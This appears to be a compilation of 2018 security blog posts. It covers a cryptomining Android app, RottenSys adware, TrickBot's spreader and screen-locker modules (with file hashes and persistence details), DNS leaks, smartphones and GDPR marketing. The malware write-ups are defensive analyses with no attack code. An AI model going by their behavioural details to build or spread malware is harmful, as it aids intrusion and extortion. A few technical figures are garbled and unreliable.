Is someone mining cryptocurrencies on my device?
Mining cryptocurrencies is a hot topic these days. Are you aware that your own devices might be mining them without you being even aware of it? As Malware Researcher at Avira, our colleague Mihai Grigorescu took a close look at MemeGenerator, a free Android app that also happens to generate Monero cryptocurrency, to see what would happen. Here are the key findings:
1. Cryptocurrency gets so hot
Adding the MemeGenerator had a huge impact on the device energy use, and the CPU as shown. The device was visibly warmer. It is not clear what running a device at such a high level will do to the device and to its battery in the long run.
2. Best cryptocurrency mining module
It is easy to craft a deceptive android application for mining Monero cryptocurrency which looks completely innocent. The Coinhive Miner makes it easy to do. The only way a user can tell – is when the device gets hot, a byproduct of the unusual load on the device during mining.
3. Tiny bits add up
The payoff for the cryptocurrency miners on your device is tiny – but can add up. Unlike PCs, mobile devices don’t have the processing power to allow an attacker to mine a significant amount of cryptocurrency. However, the small amount they do mine adds up with each infected device and apps like MemeGenerator make it possible to infect a large number of Android devices.
4. Remember, it’s your device
Here is the complete story of Mihai’s interaction with the MemeGenerator app:
That innocent first look
First thing we’ve learned about any mobile app is to look carefully at the required permissions.
Well, this application didn’t require any suspicious permissions – network access was obviously required to share any generated memes with friends, and saving files to the SD card could also be required to save the memes.
As the application seemed legit, this could trap any user into clicking “Install” to continue the installation.
After installation, the app created a nice launcher icon, so we clicked on it …
Without any explanation, we got a list of images to choose from. Thinking that this have been desired background images, we chose one:
We got two input boxes, prefilled with “Texto superior” and “Texto inferior”. After filling them with the text “why is my phone hot” we got the finished meme and options to share it via email, mms message, or Bluetooth.
At first glance, this looked like a very simple app which got the job done – it generated our customized meme.
There was absolutely nothing that would have made a user suspect that there was anything wrong going on with this app. Yet, there was a problem – the device was getting hot.
Looking under the hood
A quick look in LogCat revealed that the application was built with App Inventor and it was loading some content into a WebView.
We decompiled the application to take a closer look:
Looking through the code, we saw that the content was loaded from inside the APK file, from the android_asset folder, so we began by examining this file:
This was the HTML code that generated the list of background images we have earlier picked from, and we saw that it was loading a min.js file:
This was the Coinhive Miner from coinhive.com, we saw the same syntax in their documentation:
So, in our case, ‘K2hXuRJ7cExO4bPknDEWhDabqM0Ls8e3’ was the site key.
I was burning for you
It was no illusion – the smartphone was really getting warmed up. Before starting the app, the first CPU load graph showed a device at rest. But once the app was running, a substantial 48% of the CPU – a load value shown by the green part of the pie chart – was used consistently for mining.
MEME Cryptocurrency conclusions
Coinhive Miner makes it clear with its modular approach: it is easy to make a harmless-looking app for mining cryptocurrency. The only way a user can tell is when the device gets hot – a byproduct of the unusual load on the device when it is mining.
K2hXuRJ7cExO4bPknDEWhDabqM0Ls8e3 – coinhive site key
6d4daa7588df5e864485b6aab665bd66c79fe6aed842f22d86b8a54bd6dcc3a6 – android application
712bb1af37e7a67f86eb8b2826b8e9bd90af1d0cf213e0d8f5392dcdb5f8ed5d – coinminer JS
RottenSys: Some smartphones are coming with malware already installed
This is probably the one smartphone feature you did not have on your “must have” list: Researchers have uncovered a stream of phones hitting the market which come with malware, named RottenSys, pre-installed – without their new owners having to do a single swipe.
Nearly 5 million phones are believed to be included in this scheme. Impacted labels include GIONEE, Honor, Huawei, OPPO, Samsung, Vivo and Xiaomi. While all of the infected phones seem to have come through Tian Pai, a Chinese distributor based in Hangzhou, the precise connection has not yet been uncovered.
While the malware has been named RottenSys, impacted users see this as a more innocuous “System Wi-Fi service” app that came pre-installed their phones.
RottenSys comes in quietly
RottenSys does not start malicious as to not set off any alarms. Instead, it starts out by chatting with its command-and-control servers to get first a shopping list and then it gets the malicious code.
This particular batch of code turns into an adware campaign with a barrage of ads appearing on the victim’s device as full-screen and pop-up ads, producing a stream of ad revenue for the cybercriminals.
Then it pumps up the volume
That is just the start. The CheckPoint researchers believe the malware can then mutate according to whatever its C&C overloards command. They expect that the malware will become part of a larger botnet which could distribute other apps and change the victim’s UI around.
RottenSys is part of the modern trend in malware of not taking money directly from your pocket like ransomware – but forcing you to watch irritating ads – and then billing the advertisers for their effort. Nobody is saying if these ads are really “high value”.
Software is built like your car – drive with care
At its core, RottenSys is a supply chain vulnerability in the software industry. It is like your car, with multiple factories making foam padding, fabrics, steel frames, another factory putting this together into a seat and shipping it off to the final assembly plant where it arrives about 45 minutes before being bolted into place. Automakers watch this entire supply chain extremely closely — and RottenSys is a sign that the IT industry needs to do so as well.
What can you do to stay safe
There is a silver lining though. Due to the prerequisites that need to be given for the malware to be on your phone most of the infected phones are based in China – so if you have not bought your device from over there you should be safe. To be really sure though, you can do the following:
Go to your Android system settings and from there in the App Manager. Then look for the following possible malware package names:
- com.android.yellowcalendarz (每日黄历)
- com.changmi.launcher (畅米桌面)
- com.android.services.securewifi (系统WIFI服务)
If any of above is in the list of your installed apps, simply uninstall it and you should be fine.
Five smartphones from the Mobile World Congress
With the 2018 Mobile World Congress having just concluded, we can now review what was presented. There was no knockout presentation, no new rising trend: only the impression that this edition was just an obligatory yet non-essential meeting heading towards a new way of understanding mobile telephony. Besides, a toned-down gathering was to be expected: Samsung‘s top-of-the-range product had already been widely revealed through leaks over the previous months; Huawei clocked in with a few tablets and notebooks but no phones, while other products in their line were upgraded in order to measure up to the competition, at least in their design.
For once, the interest fell on minor brands, at least compared to more famous names which, having nothing to lose, took even more of a risk by cashing in on an event devoid of any particular focus on innovations. We’re talking about Asus and Sony, which could take off once again after years of deep obscurity, but also about the Revival of Nokia and Alcatel, two historic names in the mobile phone field that have fallen under the blows of the oligarchic Samsung-Apple-Huawei trifecta. However, something to absolutely consider over the next few months is that the 2019 edition will most likely be one of the most important events ever seen, as it will be completely dedicated to 5G services, which will be active in major cities shortly afterwards (here’s what to consider before buying a new cellphone). In the meantime, let’s take a look at the five main smartphone models from the 2018 Mobile World Congress.
Samsung Galaxy S9+
We chose the Plus version as it’s the most comprehensive: the first in the S series equipped with a double camera (here are the best phone cameras of 2017). Samsung put its primary focus on the latest optical sensors when creating its new leading product. In fact, the second lens creates a shallow depth-of-field effect, also known as bokeh, although the true innovation is inside the prime chipset. Here, the South Korean company introduced an automatic variable aperture, a system derived from semi-professional cameras, which allows more light to be captured in poor lighting conditions. In this way, you can take quality images even in dark environments, with remarkable results both in terms of definition and reducing background noise, that being those annoying pixels that stand out from the background. Also worth mentioning are the dual stereo speakers, the Dolby Atmos feature, and the arrival of AR Emojis, animated emoticons created from a selfie. Price: €999.
Asus Zenfone 5Z
This is the first Android phone by a multinational corporation to adopt the form of the iPhone X. In reality, Asus has only borrowed the front face of the phone: just enough to make any imaginable comparisons with Apple. Aesthetically, there are no half measures: either you like the Zenfone 5 or you don’t; just like the iPhone X, which has both its fans and critics. Android seems to work well on board the new Asus model, although a certain form of optimization is still truly needed in order to fully take advantage of the notch. Zenmojis are featured here as well (the usual animated emoticons), and while a sort of Face ID would have been nice, biometric fingerprint security instead takes its place. The phone will arrive in the US in June with various sizes of RAM and internal memory. Price: starting at €479.
Nokia 8 Sirocco
Everyone was expecting the Nokia 9, and yet here’s the plot twist. The new top-of-the-range product from the reinvigorated Finnish company is Sirocco, a device with a 5.5-inch OLED screen and curved edges. Its strong point is its collaboration with Carl Zeiss, a legendary name in mobile phone optics, which has already worked alongside Nokia many times. The German company provided a dual rear camera with optimal photo and video quality. Everything is powered by Snapdragon 835, which is not all that recent but still able to offer reliability as well as no delays or issues during everyday use of the device. The cost is in line with its competition, although at this point it makes more sense to wait for the Nokia 9, which will arrive on the market by the summer. Price: €749.
The French company has quietly continued to launch mid-market phones that pique some public interest. This time around, it is doing so by revolutionizing the shapes of its products, upgrading all of its new models to feature the 18:9-dimensional ratio. The 5.7-inch screen of the 2018 flagship product is truly a sight to see, and the hardware should most definitely not be underestimated. For example, it features a dual front camera that allows for panoramic selfies, so no one is left out of the shot: when the sensor recognizes that there is more than one face, it adjusts the field of view to 120 degrees to automatically shoot in wide-angle mode. There’s even a variation of Face ID, which memorizes 100 facial features to unlock the phone in just a few seconds.
Sony Xperia XZ2
Last but certainly not least is the Dynamic Vibration System: a system that Sony Mobile presented on the occasion of the Xperia XZ2 launch. Here’s how it works: an integrated algorithm converts the audio of films, games, and apps into small vibrations that travel along the surface of the phone. The dynamism of the sound proceeds at the same pace as the vibration, giving the user an additional sense of engagement in tactile form like never before. On top of this is a high-end multimedia component: a Snapdragon 845 CPU, a camera capable of recording in slow motion at 960 fps in Full HD (the Galaxy S9 stops at just 960 fps), and a design finally in line with the competition’s Full Vision smartphones. All things considered, with the Xperia XZ2, the Japanese company is ensuring a solid re-launch into the mobile phone sector. Price: €799 (to be confirmed).
Is your home a smart home? Make it safer
Give your home a free intelligence test with the Avira Home Guard. The wave of smart devices flooding homes has created a security rip current: the situation looks fine, but there are many security issues just lurking below the surface that many people are not wanting to take a deep look into.
The Internet of Things (IoT) is based on smart devices equipped to send and receive data via the internet. At first glance, a smart home equipped with a portfolio of various smart devices is great: video cameras providing 24/7 CCTV coverage, health devices sending your vital stats to the doctor, and smart thermostats that know how to keep you (efficiently) toasty warm.
Is this really so smart?
But after a second – security conscious – glance, this might not be so good. Smart devices are known for often having unencrypted communication – giving everyone between you and the device server Man-in-the-Middle easy access to your private data. The Economist Intelligence Unit* found that 70% of the devices they looked at did not encrypt the user data sent to their servers.
It’s no longer a security issue of an individual device. Mirai-inspired malware scans the internet looking for online devices “protected” only by their default settings. Once it finds these devices, they can be enslaved into a botnet and harnessed to deliver spam and even knock parts of the internet offline. And it does not help that some companies producing IoT devices use the same default settings across their entire product lineup.
It’s a global issue – but it’s also your problem
The problem is bigger than your home network. There are billions of smart devices online and it is not clear which devices are intrinsically insecure, what devices have not had passwords changed from the default settings, and who could be reading the unencrypted user data. Even though there are numerous security issues for smart devices, there are still no global standards for them.
How to properly invest in internet of things
Despite these risks, most people are in an IoT “cloud of unknowing” about the security of their home network: they are unsure – but uneasy – about the IoT devices in their network, but they aren’t taking steps to clear up this ambiguity. However, there is no reason to just fret over the potential IoT risks lurking in the shadows of the home network, it’s time to uncover them.
The need for a basic security test is why we developed Avira Home Guard. We wanted to make an app that gave people a clear look at the security of their smart home along with some suggestions on how to improve it. — Vikas Seth, Business Unit Lead at Avira.
Home Guard is a free app for Windows that scans for smart devices in the network, identifies security vulnerabilities, suggests solutions, and keeps an inventory of connected devices.
How to really make your home a smart home
Home Guard can be installed with one click via the Avira Client on Windows. Make another click, and you can start the automatic device discovery scan, giving you complete visibility into what devices are connected to your network and their potential vulnerabilities.
Here are the three primary actions with Home Guard:
- Scanning the home network. Avira Home Guard automatically discovers the connected network, then goes to work identifying everything on it. This list includes smart devices, Wi-Fi routers, cameras, smart TVs, Wi-Fi printers, media servers as well as other computers, tablets or smartphones in the house.
“I don’t think most people are really aware of just how many devices may be on their home network – even if they are techies,” explains Vikas. “There are always devices coming and going from various family members.”
- Uncovering vulnerabilities and recommending solutions. Avira Home Guard scans the router for known vulnerabilities such as open ports. Once identified, Home Guard informs and advises the user to immediately close the unwanted ports on router.
“Open external ports allow about anyone to contact and exchange information with the online device,” he added. “In this case, knowledge is power, and the alert from Home Guard is a clear sign that you should go into your router settings and shut it down.”
- Remembering all online devices. Home Guard has a memory, remembering all devices that have been connected to the network in the past in addition to automatically looking for new devices. This memory enables it to more accurately chart all devices on the network.
“Not all devices are going to be home or online when you do your first scan,” Vikas points out. “With Home Guard, this is no problem as the app will remember all devices that have been online and continuously rescan for additional ones. This lets you – as the de facto administrator of your home network – stay on top of what devices can be running around your network.”
How smart is your home?
Your house may be smarter than you think. Not only does this include your own personal devices, it includes the devices of other people within your home network, and perhaps those traditionally “dumb” devices such as fridges and light bulbs. With Home Guard, you don’t need to wonder about how smart your house may be. Instead, you can map out the connected devices in your house and the information needed to take remedial security steps. After all, a smart house should have a smart and informed owner.
TrickBot Banking Trojan Adapts with New Module
Since inception in late 2016, the TrickBot banking trojan has continually undergone updates and changes in attempts to stay one step ahead of defenders. While TrickBot has not always been the stealthiest trojan, its authors have remained consistent in the use of new distribution vectors and development of new features for their product. On March 15, 2018, Webroot observed a module (tabDll32 / tabDll64) being downloaded by TrickBot that has not been seen in the wild before this time.
It appears that the TrickBot authors are still attempting to leverage MS17-010 and other lateral movement methods coupled with this module in an attempt to create a new monetization scheme for the group.
You can teach an old bot older tricks
- 0058430e00d2ea329b98cbe208bc1dad – main sample (packed)
- 0069430e00d2ea329b99cbe209bc1dad – bot 32 bit
- 711287e1bd88deacda048424128bdfaf – systeminfo32.dll
- 58615f97d28c0848c140d5e78ffb2add – injectDll32.dll
- 30fc6b88d781e52f543edbe36f1ad03b – wormDll32.dll
- 5be0737a49d54345643c8bd0d5b0a79f – shareDll32.dll
- 88384ba81a89f8000a124189ed69af5c – importDll32.dll
- 3def0db658d9a0ab5b98bb3c5617afa3 – mailsearcher32.dll
- 311fdc24ce8dd700f951a628b805b5e5 – tabDll32.dll
Upon execution, this iteration of TrickBot will install itself into the %APPDATA%\TeamViewer\ directory. If the bot has not been executed from its installation directory, it will restart itself from this directory and continue operation. Once running from its installation directory, TrickBot will write to the usual group_tag and client_id files along with creating a “Modules” folder used to store the encrypted plug and play modules and configuration files for the bot.
Many of the modules shown above have been previously documented. The systeminfo and injectDll module have been coupled with the bot since its inception. The mailsearcher module was added in December 2016 and the worm modulewas discovered in late July 2017. The module of interest here is tabDll32 as this module has been previously undocumented. Internally, the module is named spreader_x86.dll and exports four functions similar to the other TrickBot modules.
The file has an abnormally large rdata section which proves to be quite interesting because it contains two additional files intended to be used by spreader_x86.dll. The spreader module contains an additional executable SsExecutor_x86.exe and an additional module screenLocker_x86.dll. Each module will be described in more detail in its respective section below.
When loading the new TrickBot module in IDA, you are presented with the option of loading the debug symbol filename.
This gives us a preview of how the TrickBot developers structure new modules that are currently under development. When digging deeper into the module, it becomes evident that this module is used to spread laterally through an infected network making use of MS17-010.
This module appears to make use of lateral movement in an attempt to set up the embedded executable as a service on the exploited system. Additionally, the TrickBot authors appear to be still developing this module as parts of the modules reflective dll injection mechanism are stolen from GitHub.
Image 5: Copied code from ImprovedReflectiveDLLInjection
Image 6: Printf statements from the copied project on GitHub
The second phase of the new module comes in the form of an executable meant to run after post exploitation. Again, it was very nice of the TrickBot authors to give us a look at the debug symbols file path.
When run, this executable will iterate over the use profiles in registry and goes to each profile to add a link to the copied binary to the start up path. This occurs after lateral movement takes place.
Similarly, to the other TrickBot modules, this module was written in Delphi. This is the first time TrickBot has shown any attempt at “locking” the victims machine.
This Module exports two functions, “MyFunction” and a reflective DLL loading function. “MyFunction” appears to be the work in progress:
If the TrickBot developers are attempting to complete this locking functionality, this generates interesting speculation around the group’s business model. Locking a victim’s computer before you are able to steal their banking credentials alerts the victim that they are infected, thus limiting the potential for credit card or bank theft. However, extorting victims to unlock their computer is a much simpler monetization scheme.
It is notable that this locking functionality is only deployed after lateral movement, meaning that it would be used to primarily target unpatched corporate networks. In a corporate setting (with unpatched machines) it is highly likely that backups would not exist as well. The authors appear to be getting to know their target audience and how to best extract money from them. On a corporate network, where users are unlikely to be regularly visiting targeted banking URLs, exfiltrating banking credentials is a less successful money-making model compared to the locking of potentially hundreds of machines.
The TrickBot authors continue to target various financial institutions across the world, using MS17-010 exploits in an attempt to successfully laterally move throughout a victim’s network. This is being coupled with an unfinished “screenLocker” module in a new possible attempt to extort money from victims. The TrickBot banking trojan remains under continual development and testing in a constant effort by its developers to stay one step ahead.
Spectre, Meltdown, & the CLIMB Exploit: A Primer on Vulnerabilities, Exploits, & Payloads
In light of the publicity, panic, and lingering despair around Spectre and Meltdown, I thought this might be a good time to clear up the differences between vulnerabilities, exploits, and malware. Neither Spectre nor Meltdown are exploits or malware. They are vulnerabilities. Vulnerabilities don’t hurt people, exploits and malware do. To understand this distinction, witness the CLIMB exploit:
Frequently, when a vulnerability is exploited, the payload is malware. But the payload can be benign, or there may be no payload delivered at all. I once discovered a windows vulnerability, exploited the vulnerability, and was then able to deliver the payload. Here’s how that story goes:
It’s kind of embarrassing to admit, but one evening my wife and I went out to dinner, and upon returning, realized we had a problem. It wasn’t food poisoning. We were locked out of our house. The solution was to find a vulnerability, exploit it, and get into the house. The vulnerability I found was an insecure window on the ground floor.
With care I was able to push the window inward and sideways to open it. From the outside, I was able to bypass the clasp that should have held the window closed. Of course, the window was vulnerable for years, but nothing bad came of it. As long as nobody used (exploited) the vulnerability to gain unauthorized access to my home, there was no harm done. The vulnerability itself was not stealing things from my home. It was just there, inert. It’s not the vulnerability itself that hurts you. It’s the payload. Granted, the vulnerability is the enabler.
The window was vulnerable for years, but nothing bad happened. Nobody attacked me, and while the potential for attack was present, an attack (exploit) is not a vulnerability. The same can be true of vulnerabilities in software. Opening the window is where the exploit comes in.
My actual exploit occurred in two stages. First, there was proof of concept (POC). After multiple attempts, I was able to prove that the vulnerable window could be opened, even when a security device was present. Next, I needed to execute the Covert Lift Intrusion Motivated Breach (CLIMB) exploit. Yeah, that means I climbed into the open window, a neat little exploit with no coding required. I suppose I could have broken the window, but I really didn’t want to brick my own house (another vulnerability?).
Now we come to the payload. In this case, the payload was opening the door for my wife. You see, not all payloads are malicious. If a burglar had used the CLIMB exploit, they could have delivered a much more harmful payload. They could have washed the dishes (they wouldn’t, unless they were Sheldon Cooper), they could have stolen electronic items, or they could have planted incriminating evidence. The roof is the limit.
Not all vulnerabilities are as easy to exploit as others. All of my second-floor windows had the same vulnerability, but exploiting them would have been more difficult. I am sure happy that I found the vulnerability before a criminal did. Because I was forgetful that fateful night, I’m also happy the vulnerability was there when I found it. As I said, I really didn’t want to break my own window. By the way, I “patched” my windows vulnerability by placing a wooden dowel between the window and the wall.
There you have it. Vulnerabilities, exploits, and payloads explained through the lens of the classic CLIMB exploit.
Cyber News Rundown: Hackable Gas Stations
Global Gas Station Software Found Unsecured
Researchers have recently discovered a vulnerability that would allow anyone to remotely access thousands of gas stations from around the world. The vulnerability stems from having these stations be connected to the Internet and can give the potential attacker control of gas prices, access to customer payment information, and even control over surveillance cameras. Unfortunately, due to the average age of the pumps in question and the preinstalled software also being outdated, it is unlikely that many of the machines will, or even can, be updated to protect against these vulnerabilities.
NHS Staff Ignoring Security Policies in Favor of Usability
In a recent survey of NHS professionals, it was found that nearly half are using non-approved messaging apps on a regular basis, rather than more secure channels, as they as quicker and easier to use. Even more alarming, a similar number were either completely unaware of their organization’s policies for safely transferring data or had not received any training on the subject. With data security becoming ever more necessary, the organizations that hold our most sensitive data should be held to an even higher standard, as typical consumers have little choice but to trust that they will keep it safe.
Fortnite Mobile Invite Scams Flood Market Prior to Launch
In the days preceding the launch of Fortnite’s Mobile iOS functionality, hundreds of users have taken to posting fake “invites” for sale, throughout various social media sites. While the actual launch is still several days away, these invites have been offered for a variety of prices in hopes of finding someone eager enough to pay to play early.
AMD Chips Contain Critical Vulnerabilities
Over the last week or so, several critical flaws have been found within AMD processor chips that could be harmful, if exploited. While it would already require some administrative access to even begin using the vulnerabilities for harm, the exploit does allow unsigned, and possibly malicious, code to be uploaded to AMD’s Secure Processing Platform without performing any security checks. As these vulnerabilities are still being researched, the extent of their severity has yet to be fully decided.
Florida Virtual School Hit by Data Breach
Within the last few weeks, officials have been working to contact students, parents, and staff that may have been affected by a data breach that occurred sometime in the last year. While it is still unclear on what sensitive data may have been compromised, identity and credit monitoring services are being provided to anyone who has been in the database over the two-year period when it was illicitly accessed.
Psst! Don’t let your DNS leak all over the internet
When it comes to encryption, it’s that last mile in front of the house that matters. Encryption offered by some security products can leave a lot to be desired – particularly the last mile up to your front door. While they might be encrypting the contents of your online activities, they are often failing to do this for your DNS – the Domain Name System – the process for converting URLs into numerical IP addresses.
Hey you down there!
That’s like living in a second-floor apartment with a secured main door and a broken intercom. When a friend comes to visit, you stick your head out the window and shout down below, “Hey Robert! The PIN code for the front door is 12345 and I’m on the second floor.”
What a security failure. Everyone within earshot knows exactly where you live, that you have a visitor, what his name is – and let’s not talk about that private security code.
This little shout out the window is what security people call a DNS leak. It’s very clear that the two individuals were talking but we just don’t know about what Robert and John were speaking (that part might have been encrypted). From just a common sense perspective, “John was talking to Robert” is a much less secure and private conversation than “John was talking to someone.”
The who, what, and where
For a “normal” unencrypted online interaction, this means that the Internet Service Provider (ISP) – or anyone else rubbernecking their way into the conversation between John and Robert – knows three basic details about the conversation:
- They know who was speaking (thanks to the DNS).
- They know what was being said (reading those unencrypted data packets).
- They know the where (geo-locating that IP address).
When it comes to the benefits from a VPN, the where and the what are at the top of the list. Where – yes, people like being able to get geo-restricted content. Especially those everyday sites that you go to at home and would really like to see when on vacation. What is also important. The knowledge that about anyone can intercept and track online activity over an open WiFi is unsettling. In many ways, it does not matter if it is the network manager at the local café or a cyber criminal sitting across from me in that same café – I just don’t want them listening in to my conversation. So I will encrypt the conversation and keep it a private conversation.
Let’s talk about the who
The who is where the DNS, short for Domain Name System, comes in. This is the process for translating domain names like avira.com into a numerical IP address such as 18.104.22.168. Once you go online under normal circumstances and type in an URL, your device contacts the DNS server run by your internet provider and asks it for the DNS address so it can send them your data packets.
They know who you are talking to – but it is not a given. You don’t have to give your ISP this information – if you have a VPN properly working.
More than a wee little DNS leak
The problem is that VPNs and proxy PNs have DNS issues – they can leak. And they leak a LOT. Researchers from Australia’s Commonwealth Scientific and Industrial Research Organization (CSIRO), the University of New South Wales, and the University of California, Berkeley looked at 283 VPN apps for Android-powered smartphones and found more than just small leaks. Their report stated, “66% of the VPN apps do not forward DNS traffic through the VPN tunnel so any in-path observer can monitor the DNS networking activity of the user.” Yes, leaking apps are “not effective against surveillance and malicious agents.”
DNS puddle is a dual problem
A DNS leak is a dual problem. First, it lets the ISP – and about anyone else listening in – know just whom you are contacting. While the contents of the conversation may be private, they would know that “John was talking to Robert”
Second, it lets the ISP be a potential traffic cop. Not only do they know who you are communicating with, they are potentially in the position to block access to certain sites. This could be an app such as Twitter or a website with streaming content that has upset the local authorities.
Remember the DNS
A VPN should – if done correctly – keep your DNS info private and encrypted. And it should be doing this regardless of whether your device is running on something by Android, Apple, or Windows and regardless of whether it is a free or a premium app. If you want to talk to Robert, make it really private.
Evolving Cyberattacks – The Escape
Why are sophisticated techniques failing to defend companies from Cyberattacks?
As the introduction of the internet has created a new battlefield, you can have world-class firewalls, or keep your system updated with the latest anti-virus software releases, and yet your business will not be immune to data breaches, cyberattacks, and internal threats.
A study conducted by the Ponemon Institute in 2016, exemplifies the fact that cyber attackers are winning over “defenders” as they are exploiting the vulnerabilities much faster than defenders are mitigating them. The study revealed that 55 percent of small businesses have been subject to a cyberattack in the previous year, while 50 percent said they were victims to a data breach during this year.
However, cyberattacks do not account for the largest part of the SMB data breaches. The Ponemon survey confirmed that 41 percent of SMBs data were compromised due to mistakes made by negligent employees, contactors, and also third-parties.
Moreover, according to EUROPOL, IOCTA 2017 Assessment, a portion of the announced cyber-attacks from mid-2017 represents this pattern. For authentic financially motivated attacks, exertion remains a typical strategy, with ransomware and Distributed Denial of Service (DDoS) attacks remaining needs for EU law enforcement. Europol claimed that CNI firms should be “better instructed, prepared and equipped to manage these attacks”, using the GDPR and NIS Directive to enhance baseline security. It added that law enforcement’s “prevention and awareness” strategies needed to adapt to the growth of social engineering as an “essential tactic”.
Ilia Kolochenko, the CEO of High-Tech Bridge, argued that ransomware will be around for at least another decade. He added that “Many organizations and individuals have abandoned machines they have not updated for years for various reasons, from overt negligence to complicated business processes and compliance. Worse, many large companies and governmental organizations don’t even have a comprehensive and up-to-date inventory of their digital assets, and are not even aware that such systems exist.”
Why should organizations consider a cybersecurity awareness training program?
Given that attackers have attained a level of sophistication that cannot be resolved by using traditional defensive strategies, it is important to focus on educating users, as they are the key components in cyber security. If users lack proper awareness and education on how to utilize cyber means in their daily operations, your defense system will have a massive gap and security controls will fail to be effective. This modern era of cyberattacks expects clients to participate in the cyber protection of the organization, and the greatest mistake that organizations seem to make is to rely only on sophisticated technology and software as cyber-defense mechanisms.
Figure 1. Statistics regarding data breaches – January 2017 until June 2017
Phishing attacks account for 91 percent of data breaches, and if users are not prepared to recognize and properly respond to these attacks, the danger of an effective breach or malware attack, for example ransomware, is significantly increased.
That being said, organizations should implement a policy on employee cyber-security awareness, and acknowledge the cyber-security awareness as an active cyber defense measure that facilitates the fight against cyber threats. Considering the unavoidable financial, productivity and reputation costs incurred due to an information theft, a prior well thought plan on how to manage these situations should be established.
In this case, the ISO/IEC 27032 standard gives guidelines and explanations on how companies can ensure safer data processing. There are security issues that are not covered by current information security, network security and security application, as there are gaps between these domains as a result of poor communication between the organizations. Therefore, this International Standard addresses Cyberspace security or Cybersecurity issues by bridging the gaps between different security domains in Cyberspace. Visit our web site for ISO27032 Cybersecurity Training courses.
Author: Ardian Berisha is the Portfolio Marketing Manager for Information Security Management at PECB. He is in charge of conducting market research while developing and providing information related to ISM standards. If you have any questions, please do not hesitate to contact him: email@example.com.
Co-Author: Albion Bikliqi is the PECB’s Information Security Manager. He is the key person or the process owner for all the activities pertaining to protecting the confidentiality and integrity of any related business data that is of great significance to the organization. While carrying out these ongoing activities, he ensures that the organization’s rules and regulations are being adhered by the employees. If you have any questions, please do not hesitate to contact him: firstname.lastname@example.org.
How to turn GDPR compliance into an opportunity?
GAINING A COMPETITIVE ADVANTAGE FROM THE GDPR
The information era brings blessings to the human society, but at the same time threatens people’s privacy. As humans spend increasing amounts of time in the digital world, personal data protection is placed at the heart of many hot debates, which often conclude that we currently live in a world where people’s privacy is highly fragile.
While various reports show an unprecedented rise in personal data breaches, it is vital for organizations to start prioritizing the protection of confidential data as an effort to maintain stable efficiency and prevent financial losses. Given that the GDPR enforcement date is just around the corner, businesses should take the necessary measures to ensure compliance with the new regulation.
Initially, GDPR will certainly be a challenge; however, the benefits and added value for both businesses and customers derived by GDPR compliance will offset the challenges and difficulties faced.
General Data Protection Regulation (GDPR) offers a distinctive opportunity for businesses to better respond to customer requests. GDPR will change the way organizations approach data privacy, how they handle and process data, including how data protection policies and impact assessments are established and conducted.
As businesses begin to implement, monitor and review controls and procedures to be GDPR compliant, they will witness its long-term benefits. Some of these benefits are outlined below:
It is important for companies to take a proactive approach to lessen the probability of penalties and gain competitive advantage. GDPR will allow organizations to implement good data handling practices and build transparency, thus allowing them to grow their customer base and avoid brand reputation damage. This will help the organizations maintain the existing customers and attract new ones, as they will feel confident that their data is maintained and processed by trustworthy systems.
Author: Endrita Muhaxheri is the Portfolio Marketing Manager for Governance, Risk, and Compliance & Health, Safety and Environment at PECB. She is responsible for continually conducting market research and writing articles and marketing materials related to GRC and HSE. If you have any questions, please do not hesitate to contact her: email@example.com.